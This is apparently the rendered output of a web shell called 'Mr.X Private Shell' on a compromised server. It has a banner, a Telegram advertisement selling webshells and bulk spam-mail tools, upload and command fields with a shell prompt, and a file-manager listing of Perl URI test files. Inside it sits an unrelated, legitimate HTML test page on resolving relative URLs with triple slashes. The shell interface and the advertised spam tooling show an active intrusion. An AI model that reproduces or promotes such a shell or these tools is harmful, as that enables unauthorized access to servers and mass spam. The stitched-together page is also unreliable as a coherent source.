����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<HTML><HEAD>
<TITLE>Examples of Resolving Relative URLs, Part 5</TITLE>
<BASE href="http:///s//a/b/c">
</HEAD><BODY>
<H1>Examples of Resolving Relative URLs, Part 5</H1>

This document has an embedded base URL of
<PRE>
   Content-Base: http:///s//a/b/c
</PRE>
in order to test a notion that Tim Berners-Lee mentioned regarding
the ability of URIs to have a triple-slash (or even more slashes)
to indicate higher levels of hierarchy than those already used by URLs.
This is the same as Part 4, except that the scheme "fred" is replaced
with "http" for clients that stupidly change their parsing behavior
based on the scheme name.

<H2>Tested Clients and Client Libraries</H2>

<DL COMPACT>
<DT>[R]
<DD>RFC 2396 (the right way to parse)
<DT>Tim
<DD>Tim Berners-Lee's proposed interpretation
<DT>[1]
<DD>Mozilla/4.03 [en] (X11; U; SunOS 5.5 sun4u; Nav)
<DT>[2]
<DD>Lynx/2.7.1 libwww-FM/2.14
<DT>[3]
<DD>MSIE 3.01; Windows 95
<DT>[4]
<DD>NCSA_Mosaic/2.6 (X11;SunOS 4.1.2 sun4m)
</DL>

<H3>Synopsis</H3>

RFC 1808 specified that the highest level for relative URLs is indicated
by a double-slash "//", and therefore that any triple-slash would be
considered a null site component, rather than a higher-level component
than the site component (as proposed by Tim).<P>

Draft 09 assumes that a triple-slash means an empty site component,
as does Netscape Navigator if the scheme is known.
Oddly, Lynx seems to straddle both sides.

<H2>Examples</H2>
<PRE>
                  RESULTS                       from

<a href="g:h">g:h</a>            =  g:h                           [R,Tim,2,3]
                  http:///s//a/b/g:h            [1]

<a href="g">g</a>              =  http:///s//a/b/g              [R,Tim,1,2,3]

<a href="./g">./g</a>            =  http:///s//a/b/g              [R,Tim,1,2,3]

<a href="g/">g/</a>             =  http:///s//a/b/g/             [R,Tim,1,2,3]

<a href="/g">/g</a>             =  http:///g                     [R,1,2,3]
                  http:///s//a/g                [Tim]

<a href="//g">//g</a>            =  http://g                      [R,1,2,3]
                  http:///s//g                  [Tim]

<a href="//g/x">//g/x</a>          =  http://g/x                    [R,1,2,3]
                  http:///s//g/x                [Tim]

<a href="///g">///g</a>           =  http:///g                     [R,Tim,1,2,3]

<a href="./">./</a>             =  http:///s//a/b/               [R,Tim,1,2,3]

<a href="../">../</a>            =  http:///s//a/                 [R,Tim,1,2,3]

<a href="../g">../g</a>           =  http:///s//a/g                [R,Tim,1,2,3]

<a href="../../">../../</a>         =  http:///s//                   [R,1]
                  http:///s//a/../              [Tim,2]
                  http:///s//a/                 [3]

<a href="../../g">../../g</a>        =  http:///s//g                  [R,1]
                  http:///s//a/../g             [Tim,2]
                  http:///s//a/g                [3]

<a href="../../../g">../../../g</a>     =  http:///s/g                   [R,1]
                  http:///s//a/../../g          [Tim,2]
                  http:///s//a/g                [3]

<a href="../../../../g">../../../../g</a>  =  http:///g                     [R,1]
                  http:///s//a/../../../g       [Tim,2]
                  http:///s//a/g                [3]
</PRE>
</BODY></HTML>

Filemanager

Name Type Size Permission Actions
00-report-prereqs.dd File 3.7 KB 0644
00-report-prereqs.t File 5.88 KB 0644
abs.t File 5.44 KB 0644
clone.t File 331 B 0644
cwd.t File 176 B 0644
data.t File 2.28 KB 0644
escape-char.t File 613 B 0644
escape.t File 2.88 KB 0644
file.t File 3.61 KB 0644
ftp.t File 803 B 0644
ftpes.t File 231 B 0644
ftps.t File 230 B 0644
generic.t File 3.71 KB 0644
geo_basic.t File 1.72 KB 0644
geo_construct.t File 2.1 KB 0644
geo_point.t File 429 B 0644
gopher.t File 1020 B 0644
heuristic.t File 3.35 KB 0644
http.t File 1.08 KB 0644
icap.t File 1.08 KB 0644
idna.t File 503 B 0644
ipv6.t File 220 B 0644
irc.t File 890 B 0644
ircs.t File 239 B 0644
iri.t File 2.71 KB 0644
ldap.t File 2.38 KB 0644
mailto.t File 2.34 KB 0644
mix.t File 1.44 KB 0644
mms.t File 555 B 0644
news.t File 1.01 KB 0644
num_eq.t File 389 B 0644
old-absconf.t File 730 B 0644
old-base.t File 34.04 KB 0644
old-file.t File 2.71 KB 0644
old-relbase.t File 748 B 0644
otpauth.t File 8.33 KB 0644
path-segments.t File 1000 B 0644
pop.t File 828 B 0644
punycode.t File 2.22 KB 0644
query-param.t File 1.96 KB 0644
query.t File 3.29 KB 0644
rel.t File 541 B 0644
rfc2732.t File 1.86 KB 0644
roy-test.t File 936 B 0644
roytest1.html File 7.32 KB 0644
roytest2.html File 3.56 KB 0644
roytest3.html File 3.01 KB 0644
roytest4.html File 3.63 KB 0644
roytest5.html File 3.28 KB 0644
rsync.t File 263 B 0644
rtsp.t File 651 B 0644
scheme-exceptions.t File 480 B 0644
scp.t File 283 B 0644
sftp.t File 285 B 0644
sip.t File 2.23 KB 0644
smb.t File 838 B 0644
smtp.t File 954 B 0644
sort-hash-query-form.t File 354 B 0644
split.t File 994 B 0644
sq-brackets-legacy.t File 1.08 KB 0644
sq-brackets.t File 8.01 KB 0644
ssh.t File 283 B 0644
storable-test.pl File 577 B 0644
storable.t File 234 B 0644
urn-isbn.t File 746 B 0644
urn-oid.t File 278 B 0644
urn-scheme-exceptions.t File 525 B 0644
userpass.t File 429 B 0644
utf8.t File 543 B 0644
ws.t File 1.06 KB 0644